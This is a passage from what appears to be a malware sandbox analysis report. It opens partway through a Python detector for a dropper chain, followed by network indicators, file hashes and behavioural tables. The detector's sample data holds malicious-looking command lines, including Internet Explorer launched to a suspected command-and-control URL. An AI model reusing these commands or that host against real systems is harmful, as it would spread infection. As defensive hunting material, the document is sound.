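    r'C:\Temp\ojgbvtnlgaysqkfd.exe run',
    r'"C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home',
    r'C:\temp\CreateProcess.exe C:\Temp\pkecwupjey.exe ups_run',
    r'C:\Temp\pkecwupjey.exe ups_run',
    r'C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release',
    r'C:\windows\system32\ipconfig.exe /release',
    r'C:\temp\CreateProcess.exe C:\Temp\i_pkecwupjey.exe ups_ins',
    r'C:\Temp\i_pkecwupjey.exe ups_ins',
    r'C:\temp\CreateProcess.exe C:\Temp\lgeysqlidx.exe ups_run',
    r'C:\Temp\lgeysqlidx.exe ups_run',
    r'C:\Windows\System32\cmd.exe /c ipconfig /all',       # benign: no /release
    r'C:\Windows\System32\ipconfig.exe /all',              # benign
    r'C:\Temp\setup.exe ups_run',                          # benign: name shape differs
]


def classify(cmd):
    """Map one command line to the part of the chain it belongs to, or None."""
    m = LAUNCHER_RE.match(cmd)
    if m:
        return {"kind": "launcher", "child": classify(m.group("child"))}
    m = PAYLOAD_RE.match(cmd)
    if m:
        return {"kind": "payload", "name": m.group("name"),
                "stage": m.group("stage"), "installer": bool(m.group("ins"))}
    if IPCONFIG_RELEASE_RE.search(cmd):
        return {"kind": "ipconfig_release"}
    m = IE_URL_RE.search(cmd)
    if m:
        return {"kind": "browser_url", "url": m.group("url")}
    return None


def correlate(cmds):
    """Group the stages seen per random name and collect the side indicators."""
    stages = defaultdict(set)    # name -> stages actually executed
    launched = defaultdict(set)  # name -> stages requested through CreateProcess.exe
    release_via_launcher = 0
    urls = set()
    for cmd in cmds:
        info = classify(cmd)
        if info is None:
            continue
        if info["kind"] == "launcher":
            child = info["child"]
            if child and child["kind"] == "payload":
                launched[child["name"]].add(child["stage"])
            elif child and child["kind"] == "ipconfig_release":
                release_via_launcher += 1
        elif info["kind"] == "payload":
            stages[info["name"]].add(info["stage"])
        elif info["kind"] == "browser_url":
            urls.add(info["url"])
    return {"stages": dict(stages), "launched": dict(launched),
            "release_via_launcher": release_via_launcher, "urls": sorted(urls)}


def detect(cmds):
    """Return human-readable findings; an empty list means the chain was not seen."""
    r = correlate(cmds)
    findings = []
    for name, seen in sorted(r["stages"].items()):
        # A name that reached both stages is the chain; a lone ups_run is kept
        # as context rather than alerted on.
        if {"ups_run", "ups_ins"} <= seen:
            via = sorted(r["launched"].get(name, ()))
            findings.append(f"run+install pair for dropped payload '{name}' "
                            f"(stages requested via CreateProcess.exe: {via})")
    if r["release_via_launcher"]:
        findings.append(f"CreateProcess.exe ran 'ipconfig /release' "
                        f"{r['release_via_launcher']} time(s)")
    for url in r["urls"]:
        findings.append(f"Internet Explorer launched with URL {url} (IOC candidate)")
    return findings


if __name__ == "__main__":
    for line in detect(SAMPLE_CMDLINES):
        print(line)
```

The detector keys on the helper's location, the ten-letter name shape and the ups_run/ups_ins arguments, all of which are trivial for the author to change, so treat it as a hunt for this specific build and pair it with the file hashes listed under Files. The ipconfig /release match is deliberately not an alert by itself: it is common in benign scripts, and it only becomes informative here because the same launcher issues it between every run and install stage.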
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | xytets.com | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
\Temp\ojgbvtnlgaysqkfd.exe
| MD5 | 62d7f84f3f59b5aa4e5699e0229555f6 |
| SHA1 | d831ae491d3a8d1129ef99aebf876412529dd37f |
| SHA256 | 41dd1fb76d353be8b272623269346a9c7b45a8f3fd27916d5334c0f12de6b438 |
| SHA512 | 997ed796611933a51a7b027970ae8c9aa72ae1d18c3ee5bd61459bf3cc030c8ae5299da49c9fe0af45b69f0ff16bb780f39924df11509e1883c53a76685f3093 |
\Temp\CreateProcess.exe
| MD5 | 0dcd3f530356735b5c614568dd52ee57 |
| SHA1 | 6e14c8776aa542004e84e73d04a157249b767dbb |
| SHA256 | 9b781d10953b5c97b2c3ad63c002b18a14b50bc333ff6286137112dea0ff09a8 |
| SHA512 | cf2206f806147346c9f8dcd71ae8eceaef76e141fc55f7bade76a6b1de7e44121a2888c3e414888b7426909f0fd6def8edc0da08beb05824ad6fef2cc2065ad5 |
C:\Temp\pkecwupjey.exe
| MD5 | 354c3d4a101f203ab0ac6489009d1c61 |
| SHA1 | a622dca902245f4c982d89cc7bf4dd69a07c487e |
| SHA256 | c19b5dc62a31196f70ce175f63cfb4f8dbe4b60123aaebc7fb01890455f82c92 |
| SHA512 | 2519774adc9349b4cb437d5a558ccb7cadccddaa0f2565c7bda00c706d57da8e026ac4162150ab6ce943ac66f59f1133fb75888e6bd34c18bb5ea6779ff644a2 |
C:\Temp\i_pkecwupjey.exe
| MD5 | b41de74463a1839ece52343fb660a3f8 |
| SHA1 | 35c4d6f3c75eeaf249007a17cf84762bf701575d |
| SHA256 | be2041a400a46b9c7e97fefd3e25f7f217b8a82c332f788926c978785364c6f8 |
| SHA512 | b6fb662d6a6d1e8dd33c03288c4a271fc16c05d82896b7a9c975ef9a0da5b231383a22c51f557a404b777cef33a75b3723c4bd4abfb4bc4a62fd53dc0baf8917 |
C:\Temp\lgeysqlidx.exe
| MD5 | 5d0601686fd65961c8ab4983c2948a70 |
| SHA1 | 8f9fad54ba7e5de161f964903ebdca613eb49903 |
| SHA256 | a4f692681f877a7b666c8820dbaccad09ea128a2c2802717dd6ceb4f47482ac1 |
| SHA512 | b08a3e6b9e220a4f8dbba8fd4badce25c701c0182bbc4e08cfcfb597765f0c67613112bbbfba1d0d4323540ec9b9f5ce365a7acd3e3a795ce6651bdc24fdf495 |
C:\Users\Admin\AppData\Local\Temp\CabADCF.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarAEBE.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2f1d0b4e87901ee59542a6933c299013 |
| SHA1 | 23945fa3536accb6b501807b601bebb6bc633c82 |
| SHA256 | 35b4f0c0af2760e659d3dfdae19567fef12f267067b31b072702db5acb058529 |
| SHA512 | 34a55ab8bad1ca2ecdc14f6d08ddc35be075258e80dd1908ebf4ec8702eed4bcc6613736e410ea02485b74f9cf596830d649eaaf8594de2b265f3a46381cddec |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8e77711fc9db466571e1b167450904d0 |
| SHA1 | e114cf62b3ec08e9ce66f7bf700de8239fe5f2bb |
| SHA256 | 61d96bda5e5593c46f7a6efc1ff3e20e74465c6acd5b0c5cf8afa06e67b1f4ee |
| SHA512 | e07e1a217d4fda8efb74e2df534ddb788a315dc352cdd41c44c15820ff7c945d6c3cc970c290518df5234ee7e05bd9abdf4cc183d022684435d00212f20d4576 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4f1e9f2a11e42372813f0540e08c3fbe |
| SHA1 | 11378e7274506c18b722fe17c1e3029f41bd10a9 |
| SHA256 | 4a3aaba265a83ae8d1b54b63184e416b643b750b6262068a25dbdb5b5632e91d |
| SHA512 | c436413a97b08bb04889fa78e86a91a2fbbdbf85730d004e98cb09399ee36a93a74e5e5520a4dcc5b47b6c12a6d76de40be60817b2dd22f249dcfbf0efb82b57 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1f41702c3e281c6d2597011965d82641 |
| SHA1 | 9b118f9db6c066e7c704402071ab0104bd99836f |
| SHA256 | ba24a1ee6bb9b948ba2032764eb0ee8caaa4bf689991f8441c8380b7ff5b65b1 |
| SHA512 | 83a81af1a9b5a9aebc2c147368e562cbb17b07d1574de8feabfb0c6704de8f8028fe2551c871fc040480fcfbecf853ca5415d85a7cb37b9a3356db068801f8eb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ebf791d5824bff38fbd13365da347451 |
| SHA1 | 410f436edc3220ebb79585d80169450ca6b77a1e |
| SHA256 | 7cf3c980805c3d65ec1948ae5406429db4e4f2cb746e637df5cb4c6654d630c8 |
| SHA512 | b8212d32a28fe81a9fdc53c56a7417a6b4459c03426a56df76777de7aa34c44e95919791e20133a75cb08ba115144c4614dfe7614bdd448b49bf05be62832ea5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9c2b1ff8d75e086c0e3eb915538279d8 |
| SHA1 | af606e7482e66b0fca8170ee74c61f942b8692f7 |
| SHA256 | 1fb342fcfe5d420abcca1d21c4108b0099747c66452f725c4b301f9476b64aaa |
| SHA512 | b045eefbfcc779df920bacaae96fd645bca9dff0e234c82b084f614896fa3445a012a3d9232c5c1d2ad25c014fe311c22632a901b0b6e99265328d2ff3d75afa |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 79b0c96bfba2931a799eca2889daada9 |
| SHA1 | b08e5a29fb7125c44c27d3353b35717a8231b311 |
| SHA256 | e01b11fc6aa706a78bd948b67b571f6642faec929702f0ccc51636d13df311e8 |
| SHA512 | e73583d2e46c8ada094af668e034a2e83ce5f217bb6976535c157d58c74939c0c2843d52d11f6bfaa91d14208e5b102269ff8fb99ab289b4c62b30026b2f33c4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6c26b351d33f57598544a6375c022d97 |
| SHA1 | 9b89de255cbbd38f8bdcc78cf4b366bcddd29f9c |
| SHA256 | 5c36fed000e4e41de3ed8f3585717d4dbc5d818563d7ca036ec6070708a4b1d6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Temp\i_lgeysqlidx.exe
C:\Temp\cxrpkhcwuo.exe
C:\Temp\i_cxrpkhcwuo.exe
C:\Temp\wupjhbztom.exe
C:\Temp\i_wupjhbztom.exe
C:\Temp\wqojgbvtnl.exe
C:\Temp\i_wqojgbvtnl.exe
C:\Temp\nlfaysqkfc.exe
C:\Temp\i_nlfaysqkfc.exe
C:\Temp\caupmhfzur.exe
C:\Temp\i_caupmhfzur.exe
C:\Temp\rmgeywrljd.exe
Analysis: behavioral2
Detonation Overview
Submitted
2025-01-27 20:34
Reported
2025-01-28 02:49
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Executes dropped EXE
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\zxrpjhczur.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\oigtqljdbv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_rljdbwtomg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\upnhfzxspk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\zusmkecwup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\trljebwuom.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\zxspkicamk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_uomgezwroj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\kicavpnhfa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_qnigaysqki.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_zxrpjhczur.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_oigtqljdbv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\uomgezwroj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\wqoigbytql.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\ojgbztrljd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\fdyvqnigay.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\axsqkicaus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_zxspkicamk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\dxvpnifaysqkicav.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\temp\CreateProcess.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_kicavpnhfa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_trljebwuom.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\xrpjhczusm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\rljdbwtomg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\qkicausnkf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_smkecwupmh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_kfzxrpkhcz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_xrpjhczusm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_wqoigbytql.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\smkecwupmh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_upnhfzxspk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_tnlfdyvqoi.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\qnigaysqki.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_qkicausnkf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_axsqkicaus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\usmkfcxvpn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_usmkfcxvpn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\tnlfdyvqoi.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\kfzxrpkhcz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_zusmkecwup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_ojgbztrljd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_fdyvqnigay.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31158574" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "444797372" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fcb9c6b319d08342a9ed2bf25da18ab0000000000200000000001066000000010000200000006825e099f7be78400aeca8c813c9be085e9a858333164a16505b30518e556973000000000e80000000020000200000008af9c9b2ee7dbe097e3feb69f214a97a2440b8ae6a3d7ad089e3c84b96e08e6320000000ffd3f30b8f1dd09d1cd12230fc8c4636627b3a1e8a3e7a8107ec2c177697afa240000000c6a849490abc84dc992fc7b5f05aeff8514d8652a893df228a2dd93ff351db7ae6f3d8a2ab451848c90e4ec43076553598a007e1dbc5bfe63144a6f40f072fc3 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3971427848" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 00ed3eed2e71db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fcb9c6b319d08342a9ed2bf25da18ab000000000020000000000106600000001000020000000fd4fb3445c6722a2d381e57488e7ab7dddc0478f1ff590dd3e7b754775f67843000000000e80000000020000200000009b3141c7de4da346fa576f75cc308c1b61e8335ea95400ac8d8f14f475115c2420000000702a04fd2665ee90b691713bcbc54dd45e2a75bdb91f65e01f13168992d17daf40000000a8ca3a4edd20bd2e5fa85def9edaffdebcfe3be6d08620b95e6e1f4c21d40c5d6c575366cc3af75a953a2eacdfc3a1db15981c4d04eb5b3d62d686f141a031aa | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0444ded2e71db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{180D4172-DD22-11EF-AF2A-DA67B56E6C1B} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31158574" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3973147440" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_kicavpnhfa.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_kfzxrpkhcz.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_zusmkecwup.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_zxrpjhczur.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_trljebwuom.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_ojgbztrljd.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_oigtqljdbv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_fdyvqnigay.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_axsqkicaus.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_usmkfcxvpn.exe | N/A |
